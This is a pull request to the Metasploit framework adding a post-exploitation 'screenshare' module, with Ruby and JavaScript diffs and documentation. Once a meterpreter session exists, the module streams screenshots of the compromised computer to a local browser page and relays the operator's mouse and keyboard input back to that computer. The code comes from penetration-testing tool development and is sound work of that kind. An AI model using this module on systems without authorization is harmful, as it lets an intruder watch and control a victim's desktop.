### PR TITLE
Add screenshare post module for mouse and keyboard input

### DIFF
--- a/documentation/modules/post/multi/manage/screensaver.md
+++ b/documentation/modules/post/multi/manage/screensaver.md
@@ -15,7 +15,7 @@ The following platforms are supported:
 ## Verification Steps
 
 1. Obtain a session.
-2. In msfconsole do `use post/multi/screensaver`.
+2. In msfconsole do `use post/multi/manage/screensaver`.
 3. Set the `SESSION` option.
 4. Choose the action you want to perform via `set action NAME` (available actions described below).
 5. Do `run`.

--- a/documentation/modules/post/multi/manage/screenshare.md
+++ b/documentation/modules/post/multi/manage/screenshare.md
@@ -11,7 +11,7 @@ This module only supports some target sessions, where the keyboard, mouse and sc
 ## Verification Steps
 
 1. Obtain a native OSX or Windows session (or a Java session).
-2. In msfconsole do `use post/multi/screenshare`.
+2. In msfconsole do `use post/multi/manage/screenshare`.
 3. Set the `SESSION` option.
 4. Do `run`.
 5. Open the page in a javascript enabled browser

--- a/documentation/modules/post/multi/manage/screenshare.md
+++ b/documentation/modules/post/multi/manage/screenshare.md
@@ -1,0 +1,19 @@
+This module allows you to view and control the screen of the target computer via a local browser window. The module continually screenshots the target screen and also relays all mouse and keyboard events to session.
+
+## Target sessions
+
+This module only supports some target sessions, where the keyboard, mouse and screenshot API are supported.
+
+* Windows (e.g windows/meterpreter/*)
+* OSX (e.g osx/x64/meterpreter/*)
+* Java (e.g java/meterpreter/*)
+
+## Verification Steps
+
+1. Obtain a native OSX or Windows session (or a Java session).
+2. In msfconsole do `use post/multi/screenshare`.
+3. Set the `SESSION` option.
+4. Do `run`.
+5. Open the page in a javascript enabled browser
+
+

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -121,10 +121,22 @@ document.onkeyup = function(event) {
 }
 
 img.addEventListener("contextmenu", function(e){ e.preventDefault(); }, false);
+img.onmousemove = function(event) {
+  mouseEvent('move', event.pageX - img.offsetLeft, event.pageY - img.offsetTop);
+  event.preventDefault();
+}
 img.onmousedown = function(event) {
-  let action = 'click';
+  let action = 'leftdown';
   if (event.which == 3) {
-    action = 'rightclick';
+    action = 'rightdown';
+  }
+  mouseEvent(action, event.pageX - img.offsetLeft, event.pageY - img.offsetTop);
+  event.preventDefault();
+}
+img.onmouseup = function(event) {
+  let action = 'leftup';
+  if (event.which == 3) {
+    action = 'rightup';
   }
   mouseEvent(action, event.pageX - img.offsetLeft, event.pageY - img.offsetTop);
   event.preventDefault();

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Post
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'timwr'],
-        'Platform' => [ 'linux', 'win' ],
+        'Platform' => [ 'linux', 'win', 'osx' ],
         'SessionTypes' => [ 'meterpreter' ],
         'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' }
       )

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -39,11 +39,11 @@ class MetasploitModule < Msf::Post
   end
 
   def on_request_uri(cli, request)
-    if request.uri =~ %r{/screenshot$*}
+    if request.uri =~ %r{/screenshot$}
       quality = 50
       data = session.ui.screenshot(quality)
       send_response(cli, data, {'Content-Type'=>'image/jpeg', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
-    elsif request.uri =~ %r{/event$*}
+    elsif request.uri =~ %r{/event$}
       query = CGI.parse(request.body)
       seq = query['i'].first.to_i
       if seq <= @last_sequence + 1
@@ -73,13 +73,13 @@ class MetasploitModule < Msf::Post
 </head>
 <body onload="updateImage()">
 <noscript>
-<h2><font color="red">Error: You need Javascript enabled to watch the stream.</font></h2>
+<h2 style="color:#f00">Error: You need JavaScript enabled to watch the stream.</h2>
 </noscript>
 <img onload="updateImage()" onerror="noImage()" id="streamer">
 <br><br>
-<a href="http://www.metasploit.com" target="_blank">www.metasploit.com</a>
+<a href="https://www.metasploit.com" target="_blank">www.metasploit.com</a>
 </body>
-<script language="javascript">
+<script type="text/javascript">
 var i = 1;
 var img = document.getElementById("streamer");
 
@@ -93,7 +93,7 @@ function updateImage() {
 }
 
 function mouseEvent(action, x, y) {
-  let req = new XMLHttpRequest;
+  var req = new XMLHttpRequest;
   req.open("POST", "#{uripath}event", true);
   req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
   req.send('action='+action+'&x='+x+'&y='+y+'&i='+i);
@@ -101,7 +101,7 @@ function mouseEvent(action, x, y) {
 }
 
 function keyEvent(action, key) {
-  let req = new XMLHttpRequest;
+  var req = new XMLHttpRequest;
   req.open("POST", "#{uripath}event", true);
   req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
   req.send('action=key&keyaction='+action+'&key='+key+'&i='+i);
@@ -109,13 +109,13 @@ function keyEvent(action, key) {
 }
 
 document.onkeydown = function(event) {
-  let key = event.which || event.keyCode;
+  var key = event.which || event.keyCode;
   keyEvent(1, key);
   event.preventDefault();
 }
 
 document.onkeyup = function(event) {
-  let key = event.which || event.keyCode;
+  var key = event.which || event.keyCode;
   keyEvent(2, key);
   event.preventDefault();
 }
@@ -126,7 +126,7 @@ img.onmousemove = function(event) {
   event.preventDefault();
 }
 img.onmousedown = function(event) {
-  let action = 'leftdown';
+  var action = 'leftdown';
   if (event.which == 3) {
     action = 'rightdown';
   }
@@ -134,7 +134,7 @@ img.onmousedown = function(event) {
   event.preventDefault();
 }
 img.onmouseup = function(event) {
-  let action = 'leftup';
+  var action = 'leftup';
   if (event.which == 3) {
     action = 'rightup';
   }

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -9,13 +9,14 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-      'Name'          => 'Multi Manage the desktop of the target computer',
-      'Description'   => %q{
+      'Name'           => 'Multi Manage the desktop of the target computer',
+      'Description'    => %q{
       },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'timwr'],
-      'Platform'      => [ 'linux', 'osx', 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'timwr'],
+      'Platform'       => [ 'linux', 'osx', 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
     ))
   end
 

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -9,12 +9,15 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-      'Name'           => 'Multi Manage the desktop of the target computer',
+      'Name'           => 'Multi Manage the screen of the target meterpreter session',
       'Description'    => %q{
+        This module allows you to view and control the screen of the target computer via
+        a local browser window. The module continually screenshots the target screen and
+        also relays all mouse and keyboard events to session.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'timwr'],
-      'Platform'       => [ 'linux', 'osx', 'win' ],
+      'Platform'       => [ 'linux', 'win' ],
       'SessionTypes'   => [ 'meterpreter' ],
       'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
     ))

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -110,6 +110,13 @@ function mouseEvent(action, x, y) {
 }
 
 function keyEvent(action, key) {
+  if (key == 59) {
+    key = 186
+  } else if (key == 61) {
+    key = 187
+  } else if (key == 173) {
+    key = 189
+  }
   var req = new XMLHttpRequest;
   req.open("POST", "#{uripath}event", true);
   req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -41,8 +41,13 @@ class MetasploitModule < Msf::Post
 
   def on_request_uri(cli, request)
     if request.uri =~ %r{/screenshot$}
-      quality = 50
-      data = session.ui.screenshot(quality)
+      data = ''
+      if session.platform == 'windows'
+        session.console.run_single('load espia') unless session.espia
+        data = session.espia.espia_image_get_dev_screen
+      else
+        data = session.ui.screenshot(50)
+      end
       send_response(cli, data, {'Content-Type'=>'image/jpeg', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
     elsif request.uri =~ %r{/event$}
       query = CGI.parse(request.body)

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -7,20 +7,23 @@ class MetasploitModule < Msf::Post
 
   include Msf::Exploit::Remote::HttpServer
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'           => 'Multi Manage the screen of the target meterpreter session',
-      'Description'    => %q{
-        This module allows you to view and control the screen of the target computer via
-        a local browser window. The module continually screenshots the target screen and
-        also relays all mouse and keyboard events to session.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'timwr'],
-      'Platform'       => [ 'linux', 'win' ],
-      'SessionTypes'   => [ 'meterpreter' ],
-      'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Multi Manage the screen of the target meterpreter session',
+        'Description' => %q{
+          This module allows you to view and control the screen of the target computer via
+          a local browser window. The module continually screenshots the target screen and
+          also relays all mouse and keyboard events to session.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'timwr'],
+        'Platform' => [ 'linux', 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' }
+      )
+    )
   end
 
   def run
@@ -31,7 +34,7 @@ class MetasploitModule < Msf::Post
 
   def perform_event(query)
     action = query['action'].first
-    if action == "key"
+    if action == 'key'
       key = query['key'].first.to_i
       keyaction = query['keyaction'].first.to_i
       session.ui.keyevent_send(key, keyaction) if key
@@ -51,7 +54,7 @@ class MetasploitModule < Msf::Post
       else
         data = session.ui.screenshot(50)
       end
-      send_response(cli, data, {'Content-Type'=>'image/jpeg', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+      send_response(cli, data, { 'Content-Type' => 'image/jpeg', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
     elsif request.uri =~ %r{/event$}
       query = CGI.parse(request.body)
       seq = query['i'].first.to_i
@@ -61,11 +64,12 @@ class MetasploitModule < Msf::Post
       else
         @key_sequence[seq] = query
       end
-      while true
+      loop do
         event = @key_sequence[@last_sequence + 1]
         break unless event
+
         perform_event(event)
-        @last_sequence = @last_sequence + 1
+        @last_sequence += 1
         @key_sequence.delete(@last_sequence)
       end
 
@@ -164,7 +168,7 @@ img.ondblclick = function(event) {
 </script>
 </html>
     ^
-      send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+      send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
     end
   end
 end

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -19,43 +19,68 @@ class MetasploitModule < Msf::Post
     ))
   end
 
+  def run
+    @last_sequence = 0
+    @key_sequence = {}
+    exploit
+  end
+
+  def perform_event(query)
+    action = query['action'].first
+    if action == "key"
+      key = query['key'].first.to_i
+      keyaction = query['keyaction'].first.to_i
+      session.ui.keyevent_send(key, keyaction) if key
+    else
+      x = query['x'].first
+      y = query['y'].first
+      session.ui.mouse(action, x, y)
+    end
+  end
+
   def on_request_uri(cli, request)
     if request.uri =~ %r{/screenshot$*}
       quality = 50
       data = session.ui.screenshot(quality)
       send_response(cli, data, {'Content-Type'=>'image/jpeg', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
-    elsif request.uri =~ %r{/mouse$*}
+    elsif request.uri =~ %r{/event$*}
       query = CGI.parse(request.body)
-      action = query['action'].first
-      x = query['x'].first
-      y = query['y'].first
-      session.ui.mouse(action, x, y)
-      send_response(cli, '')
-    elsif request.uri =~ %r{/keyup$*}
-      keycode = request.body.to_i
-      session.ui.keyevent_send(keycode, 2) if keycode
-      send_response(cli, '')
-    elsif request.uri =~ %r{/keydown$*}
-      keycode = request.body.to_i
-      session.ui.keyevent_send(keycode, 1) if keycode
+      seq = query['i'].first.to_i
+      if seq <= @last_sequence + 1
+        perform_event(query)
+        @last_sequence = seq
+      else
+        @key_sequence[seq] = query
+      end
+      while true
+        event = @key_sequence[@last_sequence + 1]
+        break unless event
+        perform_event(event)
+        @last_sequence = @last_sequence + 1
+        @key_sequence.delete(@last_sequence)
+      end
+
       send_response(cli, '')
     else
       print_status("Sent screenshare html to #{cli.peerhost}")
+      uripath = get_resource
+      uripath += '/' unless uripath.end_with? '/'
       html = %^<html>
 <head>
 <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
 <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
 <title>Metasploit screenshare</title>
 </head>
-<body>
+<body onload="updateImage()">
 <noscript>
 <h2><font color="red">Error: You need Javascript enabled to watch the stream.</font></h2>
 </noscript>
-<img src="screenshot" onload="updateImage()" onerror="noImage()" id="streamer">
+<img onload="updateImage()" onerror="noImage()" id="streamer">
 <br><br>
 <a href="http://www.metasploit.com" target="_blank">www.metasploit.com</a>
 </body>
 <script language="javascript">
+var i = 1;
 var img = document.getElementById("streamer");
 
 function noImage() {
@@ -63,32 +88,35 @@ function noImage() {
 }
 
 function updateImage() {
-  img.src = "screenshot#" + Date.now();
+  img.src = "#{uripath}screenshot#" + Date.now();
   img.style = "display:";
 }
 
 function mouseEvent(action, x, y) {
   let req = new XMLHttpRequest;
-  req.open("POST", "mouse", true);
+  req.open("POST", "#{uripath}event", true);
   req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
-  req.send('action='+action+'&x='+x+'&y='+y);
+  req.send('action='+action+'&x='+x+'&y='+y+'&i='+i);
+  i++;
 }
 
 function keyEvent(action, key) {
   let req = new XMLHttpRequest;
-  req.open("POST", action, true);
-  req.send(key);
+  req.open("POST", "#{uripath}event", true);
+  req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
+  req.send('action=key&keyaction='+action+'&key='+key+'&i='+i);
+  i++;
 }
 
 document.onkeydown = function(event) {
   let key = event.which || event.keyCode;
-  keyEvent("keydown", key);
+  keyEvent(1, key);
   event.preventDefault();
 }
 
 document.onkeyup = function(event) {
   let key = event.which || event.keyCode;
-  keyEvent("keyup", key);
+  keyEvent(2, key);
   event.preventDefault();
 }
 
@@ -105,15 +133,10 @@ img.ondblclick = function(event) {
   mouseEvent('doubleclick', event.pageX - img.offsetLeft, event.pageY - img.offsetTop);
   event.preventDefault();
 }
-
 </script>
 </html>
     ^
       send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
     end
-  end
-
-  def run
-    exploit
   end
 end

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Multi Manage the desktop of the target computer',
+      'Description'   => %q{
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'timwr'],
+      'Platform'      => [ 'linux', 'osx', 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+    ))
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri =~ %r{/screenshot$*}
+      quality = 50
+      data = session.ui.screenshot(quality)
+      send_response(cli, data, {'Content-Type'=>'image/jpeg', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+    elsif request.uri =~ %r{/mouse$*}
+      query = CGI.parse(request.body)
+      action = query['action'].first
+      x = query['x'].first
+      y = query['y'].first
+      session.ui.mouse(action, x, y)
+      send_response(cli, '')
+    elsif request.uri =~ %r{/keys$*}
+      keys = request.body.to_s
+      session.ui.keyboard_send(keys) if keys.length > 0
+      send_response(cli, '')
+    else
+      print_status("Sent screenshare html to #{cli.peerhost}")
+      html = %^<html>
+<head>
+<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
+<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
+<title>Metasploit screenshare</title>
+</head>
+<body>
+<noscript>
+<h2><font color="red">Error: You need Javascript enabled to watch the stream.</font></h2>
+</noscript>
+<img src="screenshot" onload="updateImage()" onerror="noImage()" id="streamer">
+<br><br>
+<a href="http://www.metasploit.com" target="_blank">www.metasploit.com</a>
+</body>
+<script language="javascript">
+var img = document.getElementById("streamer");
+
+function noImage() {
+  img.style = "display:none";
+}
+
+function updateImage() {
+  img.src = "screenshot#" + Date.now();
+  img.style = "display:";
+}
+
+function mouseEvent(action, x, y) {
+  let req = new XMLHttpRequest;
+  req.open("POST", "mouse", true);
+  req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
+  req.send('action='+action+'&x='+x+'&y='+y);
+}
+
+function keyEvent(keys) {
+  let req = new XMLHttpRequest;
+  req.open("POST", "keys", true);
+  req.send(keys);
+}
+
+document.onkeypress = function(event) {
+  let key = event.which || event.keyCode;
+  let keys = String.fromCharCode(key);
+  keyEvent(keys);
+}
+
+img.addEventListener("contextmenu", function(e){ e.preventDefault(); }, false);
+img.onmousedown = function(event) {
+  let action = 'click';
+  if (event.which == 3) {
+    action = 'rightclick';
+  }
+  mouseEvent(action, event.clientX, event.clientY);
+}
+
+</script>
+</html>
+    ^
+      send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+    end
+  end
+
+  def run
+    exploit
+  end
+end


### PR DESCRIPTION
Based on some ideas from @schierlm I've put together a quick and dirty screenshare module to allow you to send user input from a browser to the meterpreter session.

## Verification

List the steps needed to make sure this thing works

- [x] Land https://github.com/rapid7/metasploit-framework/pull/11984
- [x] Land https://github.com/rapid7/metasploit-payloads/pull/352
- [x] Land https://github.com/rapid7/metasploit-payloads/pull/350
- [x] Land https://github.com/rapid7/mettle/pull/188 (for OSX sessions)
- [x] Get an osx or windows session (as root?)
- [x] `use post/multi/manager/screenshare`
- [x] `set SESSION -1`
- [x] `run`
- [x] Browse to the webpage, click and send keys
- [x] **Verify** mouse events and keys can be sent
- [x] **Verify** which keys are not being sent correctly
- [x] **Document** the thing and how it works

## TODO

- [ ] There is currently an issue on scaled displays (where 1 screen pixel != 1 mouse pixel)